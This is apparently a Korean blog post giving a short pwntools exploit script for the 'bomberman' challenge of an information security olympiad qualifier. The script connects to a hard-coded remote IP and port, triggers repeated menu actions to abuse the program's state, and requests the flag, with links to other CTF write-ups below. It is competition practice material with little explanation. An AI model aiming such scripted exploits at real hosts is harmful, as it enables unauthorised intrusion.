ii4gsp
정보보호올림피아드 예선 Q2 본문
from pwn import *
r = remote('1.209.148.228', 7677)
e = ELF('./bomberman')
def makeThread():
print r.sendlineafter('>', '1')
def removeBomb():
print r.sendlineafter('>', '4')
print r.sendlineafter('Length : ', '10')
print r.sendlineafter('Color : ', 'rainbow')
def showFlag():
print r.sendlineafter('>', '6')
print r.recv()
makeThread()
makeThread()
makeThread()
makeThread()
makeThread()
makeThread()
makeThread()
removeBomb()
showFlag()
exploit
'시스템 해킹 > CTF' 카테고리의 다른 글
BISC 2020 CTF - oldschool (0) | 2020.11.28 |
---|---|
HSCTF 6 - return-to-sender (0) | 2020.03.17 |
HSCTF 6 - byte (0) | 2020.03.17 |
[PlaidCTF 2013] ropasaurusrex (0) | 2020.03.13 |
picoCTF - NewOverFlow-2 (0) | 2020.03.10 |
Comments